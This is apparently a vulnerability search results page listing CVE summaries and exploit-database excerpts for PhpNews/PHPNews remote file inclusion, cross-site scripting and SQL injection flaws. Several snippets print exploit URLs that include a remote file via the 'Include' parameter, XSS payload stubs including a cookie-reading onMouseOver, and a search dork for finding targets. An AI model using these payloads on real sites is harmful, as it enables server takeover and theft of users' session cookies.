66 matches found
CVE-2006-7081
Multiple PHP remote file inclusion vulnerabilities in PhpNews 1.0 allow remote attackers to execute arbitrary PHP code via the Include parameter to 1 Include/lib.inc.php3 and 2 Include/variables.php3...
CVE-2006-7081
This CVE details remote PHP file inclusion in PhpNews 1.0, exploitable via the Include parameter to Include/lib.inc.php3 and Include/variables.php3. The underlying issue is likely insecure handling of user-controlled Include paths, enabling arbitrary PHP code execution on affected servers. The pr...
PhpNews远程文件包含漏洞
PhpNews是一款基于PHP的新闻管理程序。 PhpNews不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'Include'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 PHPNews PHPNews 1.0 目前没有解决方案提供,请关注以下链接: http://newsphp.sourceforge.net/index.php http://www.example.com/Path/Include/lib.inc.php3?Include=http://cmd.gif?...
CVE-2006-6356
Multiple cross-site scripting XSS vulnerabilities in templates/linktemp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the 1 url, 2 id, 3 subject, 4 username, or 5 time parameter...
CVE-2006-6357
Cross-site scripting XSS vulnerability in templates/cattemp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...
CVE-2006-6356
Multiple cross-site scripting XSS vulnerabilities in templates/linktemp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the 1 url, 2 id, 3 subject, 4 username, or 5 time parameter...
CVE-2006-6357
Cross-site scripting XSS vulnerability in templates/cattemp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...
CVE-2006-6357
PHPNews 1.3.0 and earlier contains a cross-site scripting (XSS) vulnerability in templates/cat_temp.php. The issue allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. The public details specify the affected product and file but do not provide exploit steps, aff...
CVE-2006-6356
The CVE-2006-6356 entry covers multiple XSS vulnerabilities in PHPNews 1.3.0, specifically in templates/link_temp.php. The issue allows remote attackers to inject arbitrary web script or HTML by supplying one of several parameters (url, id, subject, username, time). The root cause is input handli...
phpnews130-xss.txt
PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews ----- - Vulnerable Code: $subject by $username on $time ----- - Exploits: http://target/path-to-PHPNews/templates/linktemp.php?url="XSS...
PHPNews 1.3.0 XSS
PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews ----- - Vulnerable Code: ?php printEOT a href="$url?action=fullnewsshowcomments=1id=$id"$subject/a by $username on $timebr / ----- - Exploits:...
PHPNews 1.3 - Link_Temp.php Cross-Site Scripting
PHPNews 1.3 - LinkTemp.php Cross-Site Scripting source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...
PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in t...
PhpNews 1.0 - Include Remote File Inclusion
PhpNews 1.0 - Include Remote File Inclusion PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif?...
PhpNews 1.0 (Include) Remote File Include Vulnerabilities
No description provided by source. PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif?...
PhpNews 1.0 (Include) Remote File Include Vulnerabilities
Exploit for unknown platform in category web applications ========================================================= PhpNews 1.0 Include Remote File Include Vulnerabilities ========================================================= PhpNews v1.0 Remote File Inclusion Vulnerability Download:...
PhpNews 1.0 - 'Include' Remote File Inclusion
PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif? http://Target/Path/Include/variables.php3?Include=http://cmd.gif? milw0rm.com 2006-09-07...
multiVulns.txt
Multi-CMS/Forum Vulnability's Found by ap0c hackers pacifico & ratboy Yo! Ok, well a couple new vulnabilitys have been found by.. us : ------------------ First; e107 xss--- ------------------ link=http://w000000w00tw00t/asdadLIlink= onMouseOver='alertdocument.cookie;'...
Multiple CMS/Forum Vulnablilties
Multi-CMS/Forum Vulnability's Found by ap0c hackers pacifico & ratboy Yo! Ok, well a couple new vulnabilitys have been found by.. us : ------------------ First; e107 xss--- ------------------ link=http://w000000w00tw00t/asdadLIlink= onMouseOver='alertdocument.cookie;' h1d3="size=24HIGHLIGHT...
CVE-2004-2474
CVE-2004-2474 affects PHPNews 1.2.3. The vulnerability is a SQL injection via the mid parameter in sendtofriend.php, allowing a remote attacker to execute arbitrary SQL commands. The provided documents do not specify a fixed version or concrete remediation; one NASL entry suggests upgrading PHP, ...